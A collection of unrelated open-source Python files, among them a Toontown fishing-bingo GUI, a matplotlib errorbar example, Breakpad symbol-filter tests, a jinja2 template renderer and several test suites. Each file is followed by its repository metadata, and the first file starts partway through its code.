90, 0), image=(self.model.find('**/Gold_TTButtUP'), self.model.find('**/goldTTButtDown'), self.model.find('**/RolloverBingoButton1')), image_pos=(0, 0, 0), image_hpr=(0, 90, 0), image_color=BG.getButtonColor(0), pressEffect=False) guiButton.removeNode() arrowModel = loader.loadModel('phase_3.5/models/gui/speedChatGui') self.gameType = DirectButton(parent=self, pos=(BG.GridXOffset, 0, -8 * BG.CardImageScale[2] - 0.01), relief=None, image=arrowModel.find('**/chatArrow'), image_scale=-0.05, image_pos=(-0.2, 0, 0.025), text='', text_scale=0.045, text_fg=(1, 1, 1, 1), text_font=ToontownGlobals.getSignFont(), text_wordwrap=10.5, text_pos=(0.01, 0.008), pressEffect=False) arrowModel.removeNode() self.gameType.bind(DGG.ENTER, self.onMouseEnter) self.gameType.bind(DGG.EXIT, self.onMouseLeave) self.gameType.hide() self.jpText = DirectLabel(parent=self, pos=(BG.GridXOffset, 0, 0.22), relief=None, state=DGG.NORMAL, text='', text_scale=TTLocalizer.BCGjpText, text_pos=(0, 0, 0), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_font=ToontownGlobals.getInterfaceFont(), text_wordwrap=TTLocalizer.BCGjpTextWordwrap) self.gameOver = DirectLabel(parent=self, pos=(BG.GridXOffset, 0, 0), relief=None, state=DGG.NORMAL, text='', text_scale=textScale, text_fg=(1, 1, 1, 1), text_font=ToontownGlobals.getSignFont()) self.jpSign = DirectFrame(parent=self.parent, relief=None, state=DGG.NORMAL, pos=BG.CardPosition, scale=(0.035, 0.035, 0.035), text=TTLocalizer.FishBingoJackpot, text_scale=2, text_pos=(-1.5, 18.6), text_fg=(1, 1, 1, 1), image=self.model.find('**/jackpot'), image_pos=(0, 0, 0), image_hpr=(0, 90, 0), sortOrder=DGG.BACKGROUND_SORT_INDEX) self.makeJackpotLights(self.jpSign) self.hideJackpot() self.makeTutorial() return def destroy(self): self.cleanTutorial() self.removeGame() del self.cellGuiList self.gameOver.destroy() self.destroyJackpotLights() self.jpSign.destroy() self.nextGameTimer.destroy() self.nextGame.destroy() self.timer.destroy() self.bingo.destroy() self.gameType.destroy() DirectFrame.destroy(self) self.notify.debug('Bingo card destroyed') def loadCard(self): cardSize = self.game.getCardSize() for index in xrange(cardSize): self.cellGuiList[index].generateLogo() if index == cardSize / 2: self.cellGuiList[index].generateMarkedLogo() elif self.game.getGameState() & 1 << index: self.cellGuiList[index].disable() def disableCard(self): self.stopCellBlinking() for index in xrange(self.game.getCardSize()): self.cellGuiList[index].disable() def enableCard(self, callback = None): self.notify.info('enable Bingo card') self.stopCellBlinking() for index in xrange(len(self.cellGuiList)): if index != self.game.getCardSize() / 2: self.cellGuiList[index].enable(callback) def generateCard(self, tileSeed, zoneId): rng = RandomNumGen.RandomNumGen(tileSeed) rowSize = self.game.getRowSize() fishList = FishGlobals.getPondGeneraList(zoneId) for i in xrange(len(fishList)): fishTuple = fishList.pop(0) weight = FishGlobals.getRandomWeight(fishTuple[0], fishTuple[1]) fish = FishBase.FishBase(fishTuple[0], fishTuple[1], weight) fishList.append(fish) emptyCells = self.game.getCardSize() - 1 - len(fishList) rodId = 0 for i in xrange(emptyCells): fishVitals = FishGlobals.getRandomFishVitals(zoneId, rodId, rng) while not fishVitals[0]: fishVitals = FishGlobals.getRandomFishVitals(zoneId, rodId, rng) fish = FishBase.FishBase(fishVitals[1], fishVitals[2], fishVitals[3]) fishList.append(fish) rodId += 1 if rodId > 4: rodId = 0 for i in xrange(rowSize): for j in xrange(self.game.getColSize()): color = self.getCellColor(i * rowSize + j) if i * rowSize + j == self.game.getCardSize() / 2: tmpFish = 'Free' else: choice = rng.randrange(0, len(fishList)) tmpFish = fishList.pop(choice) xPos = BG.CellImageScale * (j - 2) + BG.GridXOffset yPos = BG.CellImageScale * (i - 2) - 0.015 cellGui = BingoCardCell.BingoCardCell(i * rowSize + j, tmpFish, self.model, color, self, image_scale=BG.CellImageScale, pos=(xPos, 0, yPos)) self.cellGuiList.append(cellGui) def cellUpdateCheck(self, id, genus, species): fishTuple = (genus, species) if self.cellGuiList[id].getFishGenus() == genus or fishTuple == FishGlobals.BingoBoot: self.notify.debug('Square found! Cell disabled: %s' % id) self.stopCellBlinking() self.cellGuiList[id].disable() self.game.setGameState(self.game.getGameState() | 1 << id) if self.game.checkForBingo(): return BG.WIN return BG.UPDATE return BG.NO_UPDATE def cellUpdate(self, cellId): self.cellGuiList[cellId].disable() def addGame(self, game): self.game = game type = game.getGameType() self.gameType.setProp('text', BG.getGameName(type)) self.gameType.setFrameSize() self.gameType.show() def getGame(self): return self.game def removeGame(self): self.stopCellBlinking() if self.game: self.game.destroy() self.game = None self.setJackpotText(None) self.resetGameTypeText() for cell in self.cellGuiList: cell.destroy() self.cellGuiList = [] return def getUnmarkedMatches(self, fish): if self.game is None: return [] matches = [] for cell in self.cellGuiList: if cell['state'] == DGG.NORMAL: if cell.getFishGenus() == fish[0] or fish == FishGlobals.BingoBoot: matches.append(cell) return matches def getCellColor(self, id): if self.game.checkForColor(id): return BG.CellColorActive return BG.CellColorInactive def resetCellColors(self): for cell in self.cellGuiList: c = self.getCellColor(cell.cellId) cell['image'].setColor(c[0], c[1], c[2], c[3]) cell.setImage() def stopCellBlinking(self): self.hideTutorial() self.resetCellColors() taskMgr.remove(self.taskNameFlashFish) def __indicateMatches(self, bFlipFlop, fish): unmarkedMatches = self.getUnmarkedMatches(fish) if len(unmarkedMatches) is 0: return Task.done if bFlipFlop: for cell in unmarkedMatches: cell['image'].setColor(1, 0, 0, 1) cell.setImage() else: self.resetCellColors() taskMgr.doMethodLater(0.5, self.__indicateMatches, self.taskNameFlashFish, extraArgs=(not bFlipFlop, fish)) return Task.done def fishCaught(self, fish): self.stopCellBlinking() self.__indicateMatches(True, fish) def setBingo(self, state = DGG.DISABLED, callback = None): self.notify.debug('setBingo: %s %s' % (state, callback)) if self.bingo['state'] == state: return if not self.game: return if state == DGG.NORMAL: self.__indicateBingo(True) if self.game.getGameType() == BG.BLOCKOUT_CARD: self.showJackpot() else: taskMgr.remove('bingoFlash') c = BG.getButtonColor(self.game.getGameType()) self.bingo['image_color'] = Vec4(c[0], c[1], c[2], c[3]) self.hideJackpot() self.bingo['state'] = state self.bingo['command'] = callback def checkForBingo(self): return self.game.checkForBingo() def __indicateBingo(self, bFlipFlop): if not self.game: return Task.done if bFlipFlop: gameType = self.game.getGameType() if gameType == BG.DIAGONAL_CARD: color = Vec4(1, 1, 1, 1) else: color = Vec4(1, 0, 0, 1) self.bingo['image_color'] = color else: c = BG.getButtonColor(self.game.getGameType()) self.bingo['image_color'] = Vec4(c[0], c[1], c[2], c[3]) taskMgr.doMethodLater(0.5, self.__indicateBingo, 'bingoFlash', extraArgs=(not bFlipFlop,)) return Task.done NumLights = 32 Off = False On = True def showJackpot(self): self.jpSign.show() for light in self.jpLights: light.show() self.flashJackpotLights(random.randrange(3)) def hideJackpot(self): self.jpSign.hide() for light in self.jpLights: light.hide() taskMgr.remove('jackpotLightFlash') def getLightName(self, lightIndex, bOn): lightIndex += 1 if bOn == self.On: return '**/LightOn_0%02d' % lightIndex else: return '**/LightOff_0%02d' % lightIndex def makeJackpotLights(self, parent): self.jpLights = [] for nLight in range(self.NumLights): lightName = self.getLightName(nLight, self.Off) light = DirectFrame(parent=parent, relief=None, image=self.model.find(lightName), image_hpr=(0, 90, 0)) self.jpLights.append(light) return def destroyJackpotLights(self): taskMgr.remove('jackpotLightFlash') for light in self.jpLights: light.destroy() def lightSwitch(self, bOn, lightIndex = -1): if lightIndex == -1: for nLight in range(self.NumLights): self.lightSwitch(bOn, nLight) else: lightIndex %= self.NumLights light = self.jpLights[lightIndex - 1] light['image'] = self.model.find(self.getLightName(lightIndex, bOn)) light['image_hpr'] = (0, 90, 0) def flashJackpotLights(self, flashMode, nTimeIndex = 0): if flashMode == 2: self.lightSwitch(self.Off) self.lightSwitch(self.On, nTimeIndex) self.lightSwitch(self.On, self.NumLights - nTimeIndex) self.lightSwitch(self.On, self.NumLights / 2 + nTimeIndex) self.lightSwitch(self.On, self.NumLights / 2 - nTimeIndex) nTimeIndex = (nTimeIndex + 1) % (self.NumLights / 2) delay = 0.05 elif flashMode == 1: if nTimeIndex: self.lightSwitch(self.On) else: self.lightSwitch(self.Off) nTimeIndex = not nTimeIndex delay = 0.5 elif flashMode == 0: for nLight in range(self.NumLights): if nLight % 2 == nTimeIndex: self.lightSwitch(self.On, nLight) else: self.lightSwitch(self.Off, nLight) nTimeIndex = (nTimeIndex + 1) % 2 delay = 0.2 taskMgr.doMethodLater(delay, self.flashJackpotLights, 'jackpotLightFlash', extraArgs=(flashMode, nTimeIndex)) return Task.done def makeTutorial(self): self.tutorial = TTDialog.TTDialog(fadeScreen=0, pad=(0.05, 0.05), midPad=0, topPad=0, sidePad=0, text=TTLocalizer.FishBingoHelpBlockout, style=TTDialog.NoButtons, pos=BG.TutorialPosition, scale=BG.TutorialScale) self.tutorial.hide() def cleanTutorial(self): self.tutorial.cleanup() self.tutorial = None return def showTutorial(self, messageType): if messageType == BG.TutorialIntro: self.tutorial['text'] = TTLocalizer.FishBingoHelpMain elif messageType == BG.TutorialMark: self.tutorial['text'] = TTLocalizer.FishBingoHelpFlash elif messageType == BG.TutorialCard: if self.game: gameType = self.game.getGameType() self.tutorial['text'] = BG.getHelpString(gameType) elif messageType == BG.TutorialBingo: self.tutorial['text'] = TTLocalizer.FishBingoHelpBingo self.tutorial.show() def hideTutorial(self, event = None): if self.tutorial: self.tutorial.hide() def onMouseEnter(self, event): if self.gameType['text'] is not '': self.showTutorial(BG.TutorialCard) def onMouseLeave(self, event): self.hideTutorial() def castingStarted(self): if taskMgr.hasTaskNamed(self.taskNameFlashFish): if not base.localAvatar.bFishBingoMarkTutorialDone: self.showTutorial(BG.TutorialMark) base.localAvatar.b_setFishBingoMarkTutorialDone(True)
ksmit799/Toontown-Source
toontown/fishing/BingoCardGui.py
Python
mit
17,376
''' Illustration of upper and lower limit symbols on errorbars ''' from math import pi from numpy import array, arange, sin import pylab as P fig = P.figure() x = arange(10.0) y = sin(arange(10.0)/20.0*pi) P.errorbar(x,y,yerr=0.1,capsize=3) y = sin(arange(10.0)/20.0*pi) + 1 P.errorbar(x,y,yerr=0.1, uplims=True) y = sin(arange(10.0)/20.0*pi) + 2 upperlimits = array([1,0]*5) lowerlimits = array([0,1]*5) P.errorbar(x, y, yerr=0.1, uplims=upperlimits, lolims=lowerlimits) P.xlim(-1,10) fig = P.figure() x = arange(10.0)/10.0 y = (x+0.1)**2 P.errorbar(x, y, xerr=0.1, xlolims=True) y = (x+0.1)**3 P.errorbar(x+0.6, y, xerr=0.1, xuplims=upperlimits, xlolims=lowerlimits) y = (x+0.1)**4 P.errorbar(x+1.2, y, xerr=0.1, xuplims=True) P.xlim(-0.2,2.4) P.ylim(-0.1,1.3) P.show()
sniemi/SamPy
sandbox/src1/examples/errorbar_limits.py
Python
bsd-2-clause
784
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit tests for filter_syms.py""" import cStringIO import ntpath import os import StringIO import sys import unittest ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) sys.path.insert(0, os.path.join(ROOT_DIR, '..')) # In root import filter_syms class FilterSysmsTest(unittest.TestCase): def assertParsed(self, input_data, ignored_prefixes, expected): input_io = cStringIO.StringIO(input_data) output_io = cStringIO.StringIO() parser = filter_syms.SymbolFileParser(input_io, output_io, ignored_prefixes, ntpath) parser.Process() self.assertEqual(output_io.getvalue(), expected) def testDuplicateFiles(self): """Tests that duplicate files in FILE records are correctly removed and that Line records are updated.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 foo/../file1_1.cc FILE 2 bar/../file1_1.cc FILE 3 baz/../file1_1.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FUNC 1000 c 0 Function1_1 1000 8 45 1 1008 4 46 1 100c 4 44 1 """ self.assertParsed(INPUT, [], EXPECTED_OUTPUT) def testIgnoredPrefix(self): """Tests that prefixes in FILE records are correctly removed.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 /src/build/foo/../file1_1.cc FILE 2 /src/build/bar/../file1_2.cc FILE 3 /src/build/baz/../file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FILE 2 file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 2 100c 4 44 1 """ IGNORED_PREFIXES = ['\\src\\build\\'] self.assertParsed(INPUT, IGNORED_PREFIXES, EXPECTED_OUTPUT) def testIgnoredPrefixesDuplicateFiles(self): """Tests that de-duplication of FILE records happens BEFORE prefixes are removed.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 /src/build/foo/../file1_1.cc FILE 2 /src/build/bar/../file1_2.cc FILE 3 D:/src/build2/baz/../file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FILE 2 file1_2.cc FILE 3 file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ IGNORED_PREFIXES = ['\\src\\build\\', 'D:\\src\\build2\\'] self.assertParsed(INPUT, IGNORED_PREFIXES, EXPECTED_OUTPUT) if __name__ == '__main__': unittest.main()
multitheftauto/mtasa-blue
vendor/google-breakpad/src/tools/python/tests/filter_syms_unittest.py
Python
gpl-3.0
4,454
############################################################################### ## ## Copyright (C) 2014-2016, New York University. ## Copyright (C) 2011-2014, NYU-Poly. ## Copyright (C) 2006-2011, University of Utah. ## All rights reserved. ## Contact: [email protected] ## ## This file is part of VisTrails. ## ## "Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## - Redistributions of source code must retain the above copyright notice, ## this list of conditions and the following disclaimer. ## - Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## - Neither the name of the New York University nor the names of its ## contributors may be used to endorse or promote products derived from ## this software without specific prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, ## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR ## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR ## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; ## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, ## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ## ############################################################################### from __future__ import division version = '1.0.5'
minesense/VisTrails
vistrails/db/versions/v1_0_5/translate/__init__.py
Python
bsd-3-clause
1,965
# Copyright 2017 datawire. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from .sops import decrypt, decrypt_cleanup from .tasks import task, TaskError from jinja2 import Environment, FileSystemLoader, Template, TemplateError, TemplateNotFound, Undefined, UndefinedError import os, shutil class WarnUndefined(Undefined): def warn(self): try: self._fail_with_undefined_error() except UndefinedError, e: msg = str(e) task.echo(task.terminal().bold_red("warning: %s (this will become an error soon)" % msg)) def __iter__(self): self.warn() return Undefined.__iter__(self) def __str__(self): self.warn() return Undefined.__str__(self) def __unicode__(self): self.warn() return Undefined.__unicode__(self) def __len__(self): self.warn() return Undefined.__len__(self) def __nonzero__(self): self.warn() return Undefined.__nonzero__(self) def __eq__(self, other): self.warn() return Undefined.__eq__(self, other) def __ne__(self, other): self.warn() return Undefined.__ne__(self, other) def __bool__(self): self.warn() return Undefined.__bool__(self) def __hash__(self): self.warn() return Undefined.__hash__(self) def _do_render(env, root, name, variables): try: return env.get_template(name).render(**variables) except TemplateNotFound, e: raise TaskError("%s/%s: %s" % (root, name, "template not found")) except TemplateError, e: raise TaskError("%s/%s: %s" % (root, name, e)) @task() def render(source, target, predicate, **variables): """Renders a file or directory as a jinja template using the supplied variables. The source is a path pointing to either an individual file or a directory. The target is a path pointing to the desired location of the output. If the source points to a file, then the target is created/overwritten as a file. If the source points to a directory, the target is created as a directory. If the target already exists, it is removed and recreated prior to rendering the template. """ root = source if os.path.isdir(source) else os.path.dirname(source) env = Environment(loader=FileSystemLoader(root), undefined=WarnUndefined) if os.path.isdir(source): if os.path.exists(target): shutil.rmtree(target) os.makedirs(target) for path, dirs, files in os.walk(source): for name in files: if not predicate(name): continue if name.endswith("-enc.yaml"): decrypt(path, name) relpath = os.path.join(os.path.relpath(path, start=source), name) rendered = _do_render(env, root, relpath, variables) outfile = os.path.join(target, relpath) outdir = os.path.dirname(outfile) if not os.path.exists(outdir): os.makedirs(outdir) with open(outfile, "write") as f: f.write(rendered) if name.endswith("-enc.yaml"): decrypt_cleanup(path, name) else: if source.endswith("-enc.yaml"): decrypt(path, source) rendered = _do_render(env, root, os.path.basename(source), variables) with open(target, "write") as f: f.write(rendered) if source.endswith("-enc.yaml"): decrypt_cleanup(path, source) @task() def renders(name, source, **variables): """ Renders a string as a jinja template. The name is used where filename would normally appear in error messages. """ try: return Template(source, undefined=WarnUndefined).render(**variables) except TemplateError, e: raise TaskError("%s: %s" % (name, e))
sipplified/forge
forge/jinja2.py
Python
apache-2.0
4,507
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Copyright (C) 2014 David Vavra ([email protected]) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. """ from yapsy.IPlugin import IPlugin class DNS(IPlugin): def __init__(self): self.hosts = {} def addHost(self,id,host): self.hosts[id] = host def parseContext(self,context,*args): for dns in context.iter('dns_host'): for dnsServer in dns.iter('dns_host'): self.addHost(dnsServer.attrib['id'],dnsServer.text)
david-vavra/pyrage
pyrage/modules/dns.py
Python
gpl-2.0
1,216
import logging import multiprocessing import os import pprint import random import socket import string import subprocess import sys import threading import unittest try: import queue except ImportError: import Queue as queue import mongobox import requests import hello LOG = logging.getLogger(__name__) def get_free_port(host): sock = socket.socket() sock.bind((host, 0)) port = sock.getsockname()[1] sock.close() del sock return port def _queued_output(out): """Use a separate process to read server stdout into a queue. Returns the queue object. Use get() or get_nowait() to read from it. """ def _enqueue_output(_out, _queue): for line in _out: _queue.put(line) output_queue = multiprocessing.Queue() # I tried a Thread, it was blocking the main thread because # of GIL I guess. This made me very confused. process = multiprocessing.Process( target=_enqueue_output, args=(out, output_queue)) process.daemon = True process.start() return output_queue class TestServerFunctional(unittest.TestCase): @classmethod def setUpClass(cls): cls.host = '127.0.0.1' cls.port = get_free_port(cls.host) cls.url = 'http://%s:%s' % (cls.host, cls.port) cls.test_env = ''.join(random.sample(string.hexdigits, 22)) # Using hello.__path__ instead of just `hello-bottle` # to ensure we don't get a rogue binary. # Use sys.executable to ensure we run the server using # the exact same python interpreter as this test is using. cls._mbox = mongobox.MongoBox() cls._mbox.start() cls.mongoclient = cls._mbox.client() # pymongo client assert cls._mbox.running() exe = os.path.realpath(hello.__file__) assert os.path.isfile(exe) argv = [ sys.executable, exe, '--host', cls.host, '--port', str(cls.port), '--verbose', '--debug', '--server', 'gevent', '--mongo-port', str(cls._mbox.port), ] server_started = "Listening on {url}/".format(url=cls.url) # ensure a hard-coded os.environ when testing! # Without the unbuffered flag this doesn't # work in > Python 3. _env = { 'PYTHONDONTWRITEBYTECODE': '1', 'PYTHONUNBUFFERED': '1', } # bufsize=1 means line buffered. # universal_newlines=True makes stdout text and not bytes cls.server = subprocess.Popen( argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, bufsize=1, env=_env, ) cls._timeout = 5 startup_timeout = threading.Timer(cls._timeout, cls.server.kill) startup_timeout.daemon = True startup_timeout.start() cls.non_blocking_read_queue = _queued_output(cls.server.stdout) # cls.server.poll() will return -9 if Timer kill() sends SIGKILL while cls.server.poll() is None: try: line = cls.non_blocking_read_queue.get_nowait() except queue.Empty: continue else: LOG.debug("Test hello-bottle server STDOUT: %s", line) if server_started in line: startup_timeout.cancel() LOG.info("hello-bottle server started successfully!") break def setUp(self): """Ensure that the server started.""" code = self.server.poll() # if code is None: server running. # if code is 0, server exited for some reason. if code: if code == -9: self.fail("Failed to start hello-bottle server within " "the %s second timeout!" % self._timeout) else: self.fail("Failed to start test hello-bottle process! " "Exit code: %s" % code) if code == 0: self.fail("Server died for some reason with a 0 exit code.") self.session = requests.session() # Set up retries to not fail during server startup delay retry = requests.packages.urllib3.util.Retry( total=5, backoff_factor=0.2) adapter = requests.adapters.HTTPAdapter(max_retries=retry) self.session.mount(self.url, adapter) @classmethod def tearDownClass(cls): cls._mbox.stop() assert not cls._mbox.running() while not cls.non_blocking_read_queue.empty(): line = cls.non_blocking_read_queue.get_nowait() LOG.debug("POST-MORTEM test hello-bottle server STDOUT: %s", line) try: cls.server.kill() except OSError: pass def _check_response(self, response): """Check for 500s and debug-tracebacks.""" if response.status_code == 500: req = response.request try: body = response.json() if 'traceback' in body: msg = ('Traceback from test hello-bottle server ' 'when calling {m} {p}\n{tb}') self.fail( msg.format(m=req.method, p=req.path_url, tb=body['traceback']) # fail ) else: self.fail(pprint.pformat(body, indent=2)) except (TypeError, ValueError): pass def test_version(self): vers = self.session.get('{}/version'.format(self.url)) self._check_response(vers) vers = vers.json() expected = { 'version': hello.__version__ } self.assertEqual(expected, vers) def test_not_found(self): response = self.session.get('{}/i/dont/exist'.format(self.url)) self._check_response(response) self.assertEqual(404, response.status_code) def test_post_and_get_document(self): data = {'junk': ''.join(random.sample(string.hexdigits, 22))} create = self.session.post( '{}/docs'.format(self.url), json=data) object_id = create.json()['id'] response = self.session.get( '{}/docs/{}'.format(self.url, object_id)) expected = data.copy() expected['_id'] = object_id self.assertEqual(response.json(), expected) if __name__ == '__main__': opts = {} if any(v in ' '.join(sys.argv) for v in ['--verbose', '-v']): logging.basicConfig(level=logging.DEBUG, stream=sys.stdout) opts['verbosity'] = 2 unittest.main(**opts)
samstav/hello-bottle
test_hello.py
Python
apache-2.0
6,762
# DO NOT EDIT THIS FILE! # # Python module CosPersistencePID generated by omniidl import omniORB omniORB.updateModule("CosPersistencePID") # ** 1. Stub files contributing to this module import CosPersistencePID_idl # ** 2. Sub-modules # ** 3. End
amonmoce/corba_examples
omniORBpy-4.2.1/build/python/COS/CosPersistencePID/__init__.py
Python
mit
251
# -*- coding: utf-8 -*- """Tests of dataset utility functions.""" #------------------------------------------------------------------------------ # Imports #------------------------------------------------------------------------------ import os.path as op from itertools import product import numpy as np from numpy.testing import assert_array_equal as ae import responses from pytest import raises, yield_fixture from ..datasets import (download_file, download_test_data, download_sample_data, _check_md5_of_url, _BASE_URL, ) from ..logging import register, StringLogger, set_level #------------------------------------------------------------------------------ # Fixtures #------------------------------------------------------------------------------ def setup(): set_level('debug') # Test URL and data _URL = 'http://test/data' _DATA = np.linspace(0., 1., 100000).astype(np.float32) _CHECKSUM = '7d257d0ae7e3af8ca3574ccc3a4bf072' def _add_mock_response(url, body, file_type='binary'): content_type = ('application/octet-stream' if file_type == 'binary' else 'text/plain') responses.add(responses.GET, url, body=body, status=200, content_type=content_type, ) @yield_fixture def mock_url(): _add_mock_response(_URL, _DATA.tostring()) _add_mock_response(_URL + '.md5', _CHECKSUM + ' ' + op.basename(_URL)) yield responses.reset() @yield_fixture(params=product((True, False), repeat=4)) def mock_urls(request): data = _DATA.tostring() checksum = _CHECKSUM url_data = _URL url_checksum = _URL + '.md5' if not request.param[0]: # Data URL is corrupted. url_data = url_data[:-1] if not request.param[1]: # Data is corrupted. data = data[:-1] if not request.param[2]: # Checksum URL is corrupted. url_checksum = url_checksum[:-1] if not request.param[3]: # Checksum is corrupted. checksum = checksum[:-1] _add_mock_response(url_data, data) _add_mock_response(url_checksum, checksum) yield request.param, url_data, url_checksum responses.reset() def _dl(path): download_file(_URL, path) with open(path, 'rb') as f: data = f.read() return data def _check(data): ae(np.fromstring(data, np.float32), _DATA) #------------------------------------------------------------------------------ # Test utility functions #------------------------------------------------------------------------------ @responses.activate def test_check_md5_of_url(tempdir, mock_url): output_path = op.join(tempdir, 'data') download_file(_URL, output_path) assert _check_md5_of_url(output_path, _URL) #------------------------------------------------------------------------------ # Test download functions #------------------------------------------------------------------------------ @responses.activate def test_download_not_found(tempdir): path = op.join(tempdir, 'test') with raises(Exception): download_file(_URL + '_notfound', path) @responses.activate def test_download_already_exists_invalid(tempdir, mock_url): logger = StringLogger(level='debug') register(logger) path = op.join(tempdir, 'test') # Create empty file. open(path, 'a').close() _check(_dl(path)) assert 'redownload' in str(logger) @responses.activate def test_download_already_exists_valid(tempdir, mock_url): logger = StringLogger(level='debug') register(logger) path = op.join(tempdir, 'test') # Create valid file. with open(path, 'ab') as f: f.write(_DATA.tostring()) _check(_dl(path)) assert 'skip' in str(logger) @responses.activate def test_download_file(tempdir, mock_urls): path = op.join(tempdir, 'test') param, url_data, url_checksum = mock_urls data_here, data_valid, checksum_here, checksum_valid = param assert_succeeds = (data_here and data_valid and ((checksum_here == checksum_valid) or (not(checksum_here) and checksum_valid))) download_succeeds = (assert_succeeds or (data_here and (not(data_valid) and not(checksum_here)))) if download_succeeds: data = _dl(path) else: with raises(Exception): data = _dl(path) if assert_succeeds: _check(data) @responses.activate def test_download_sample_data(tempdir): name = 'hybrid_10sec.dat' url = _BASE_URL['cortexlab'] + name _add_mock_response(url, _DATA.tostring()) _add_mock_response(url + '.md5', _CHECKSUM) download_sample_data(name, tempdir) with open(op.join(tempdir, name), 'rb') as f: data = f.read() ae(np.fromstring(data, np.float32), _DATA) responses.reset() @responses.activate def test_dat_file(tempdir): data = np.random.randint(size=(20000, 4), low=-100, high=100).astype(np.int16) fn = 'test-4ch-1s.dat' _add_mock_response(_BASE_URL['github'] + 'test/' + fn, data.tostring()) path = download_test_data(fn, tempdir) with open(path, 'rb') as f: arr = np.fromfile(f, dtype=np.int16).reshape((-1, 4)) assert arr.shape == (20000, 4) responses.reset()
nsteinme/phy
phy/utils/tests/test_datasets.py
Python
bsd-3-clause
5,446
